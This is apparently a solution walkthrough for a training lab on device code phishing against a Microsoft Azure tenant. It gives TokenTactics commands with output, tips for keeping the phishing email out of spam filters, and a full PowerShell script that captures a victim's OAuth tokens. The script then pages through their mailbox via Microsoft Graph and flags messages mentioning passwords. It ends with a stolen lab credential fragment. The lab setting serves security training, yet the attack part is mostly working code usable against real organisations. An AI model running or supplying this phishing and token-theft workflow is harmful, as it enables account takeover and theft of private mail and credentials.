BA Lab 02 – Solution

Based on the content of the “SolarDropsservices.azurewebsites.net” site, it is clear that the intended path is a Device Code phishing attack: the target is tricked into completing an OAuth 2.0 device authorization flow that we started, so the resulting tokens are issued to us.

There are several ways to perform a Device Code phishing attack but, for the purpose of this lab, we will use the https://github.com/rvrsh3ll/TokenTactics tool. Open a PowerShell terminal, navigate to your Tools folder and then import the TokenTactics.psd1 module manifest.

Import-Module .\BreachingAzureTools\TokenTactics-main\TokenTactics.psd1

Output:

WARNING: The names of some imported commands from the module 'TokenTactics' include unapproved verbs that might make them less discoverable. To find
the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.

Then you can generate a device code for the Microsoft Graph resource using the following (the MSGraph client is chosen deliberately, because the mailbox dump later in this lab goes through Graph):

Get-AzureToken -Client MSGraph

Output:

user_code        : C4UJUN7B3
device_code      : CAQABAAEAAAD--DLA3VO7Qr…
verification_url : https://microsoft.com/devicelogin
expires_in       : 900
interval         : 5
message          : To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code C4UJUN7B3 to authenticate.
authorization_pending
authorization_pending
authorization_pending

The command keeps polling the token endpoint (the repeated authorization_pending lines) until the target completes the sign-in. Next, we need to send a phishing email containing the verification URL and the user code to: paul@solardrops.onmicrosoft.com

Note: Even though we delete the emails regularly, it is preferable to use a test email account instead of your personal email address. Also, the device code is valid only for 15 minutes (expires_in: 900), so send the email immediately after generating the code; if it expires, generate a new one and resend.

To avoid your phishing email being sent to the Junk folder, the sender email address should be from one of the following email service providers: gmail.com, hotmail.com, hotmail.co.uk, aol.com, protonmail.com, icloud.com, yahoo.com, outlook.com or ymail.com .

When Paul (paul@SolarDrops.onmicrosoft.com) opens the link, enters the user code and signs in, the polling loop in TokenTactics completes and his access token (together with a refresh token) is captured in the $response variable.

With the token in $response, we can dump Paul's mailbox through the Microsoft Graph API using TokenTactics by executing the following command:

Dump-OWAMailboxViaMSGraphApi -AccessToken $response.access_token -mailFolder AllItems
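To show what the two TokenTactics cmdlets above actually do, the following is an added example written for this page; it is not code from the lab or from the TokenTactics project. It performs the OAuth 2.0 device authorization grant against the Azure AD v1 endpoints with Invoke-RestMethod, polls until the target signs in, and then reads the mailbox through Microsoft Graph, following paging and flagging messages that mention credentials. Assumptions: the Microsoft Office first-party client ID that TokenTactics uses for its MSGraph client, the v1 devicecode/token endpoints, that Invoke-RestMethod exposes the JSON error body in $_.ErrorDetails.Message on HTTP 400, and the keyword list used for triage.

```powershell
# Added example: device code flow + Graph mailbox read, done by hand.
$ClientId = 'd3590ed6-52b3-4102-aeff-aad2292ab01c'   # Microsoft Office client, as used by TokenTactics (assumed)
$Resource = 'https://graph.microsoft.com'
$Tenant   = 'common'

# Step 1: request a device code. user_code goes into the lure; device_code
# stays with us and is the secret we poll with.
$dc = Invoke-RestMethod -Method Post `
    -Uri "https://login.microsoftonline.com/$Tenant/oauth2/devicecode?api-version=1.0" `
    -Body @{ client_id = $ClientId; resource = $Resource }

Write-Host "Lure text for the target: $($dc.message)"
Write-Host "Code expires in $($dc.expires_in) s; polling every $($dc.interval) s"

# Step 2: poll the token endpoint. Azure AD answers HTTP 400 with a JSON error
# while the grant is pending, so the loop runs inside try/catch.
# authorization_pending is the normal state; slow_down means back off;
# expired_token / authorization_declined are terminal.
$deadline = (Get-Date).AddSeconds([int]$dc.expires_in)
$interval = [int]$dc.interval
$tokens   = $null
while (-not $tokens -and (Get-Date) -lt $deadline) {
    Start-Sleep -Seconds $interval
    try {
        $tokens = Invoke-RestMethod -Method Post `
            -Uri "https://login.microsoftonline.com/$Tenant/oauth2/token?api-version=1.0" `
            -Body @{
                grant_type = 'urn:ietf:params:oauth:grant-type:device_code'
                code       = $dc.device_code
                client_id  = $ClientId
            }
    } catch {
        $err = ($_.ErrorDetails.Message | ConvertFrom-Json).error   # assumed to carry the JSON body
        if ($err -eq 'authorization_pending') {
            # expected; keep waiting
        } elseif ($err -eq 'slow_down') {
            $interval += 5
        } elseif ($err -eq 'expired_token') {
            throw 'Device code expired before the target signed in; generate a new one.'
        } elseif ($err -eq 'authorization_declined') {
            throw 'Target declined the sign-in.'
        } else {
            throw "Unexpected token endpoint error: $err"
        }
    }
}
if (-not $tokens) { throw 'Timed out waiting for the target.' }

# The refresh token outlives the ~1h access token and can later be exchanged
# for tokens to other resources, which is what TokenTactics' RefreshTo-* cmdlets do.
Write-Host "Got access token for $($tokens.resource); refresh token length $($tokens.refresh_token.Length)"

# Step 3: read the mailbox. Graph pages results via @odata.nextLink; follow it
# so messages beyond the first page are not missed. HTML bodies are stripped
# crudely before keyword matching.
$headers  = @{ Authorization = "Bearer $($tokens.access_token)" }
$uri      = 'https://graph.microsoft.com/v1.0/me/messages?$top=50&$select=subject,from,receivedDateTime,body'
$keywords = 'password', 'credential', 'remoting', 'vpn'   # assumed triage terms
while ($uri) {
    $page = Invoke-RestMethod -Uri $uri -Headers $headers
    foreach ($m in $page.value) {
        $text = ($m.body.content -replace '<[^>]+>', '') -replace '\s+', ' '
        if ($keywords | Where-Object { $text -match $_ }) {
            [pscustomobject]@{
                Received = $m.receivedDateTime
                From     = $m.from.emailAddress.address
                Subject  = $m.subject
                Preview  = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
    }
    $uri = $page.'@odata.nextLink'
}
```

The point of doing it by hand is to see where the attack actually lives: nothing in the flow binds the device that requested the code to the browser that approves it, so whoever holds device_code receives the tokens. It also makes the operational constraints visible: polling must start before the 15-minute window closes, and the token is only useful for Graph because that is the resource it was requested for.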

Reviewing Paul's mailbox, we find the following email:

Hi Paul,

Please find below your username and the part 1/3 of your password for your local machine:

Username: localpaul, Password Part 1/3: dtOpd IP: 10.0.2.4

Have in mind that is only accessible through PS Remoting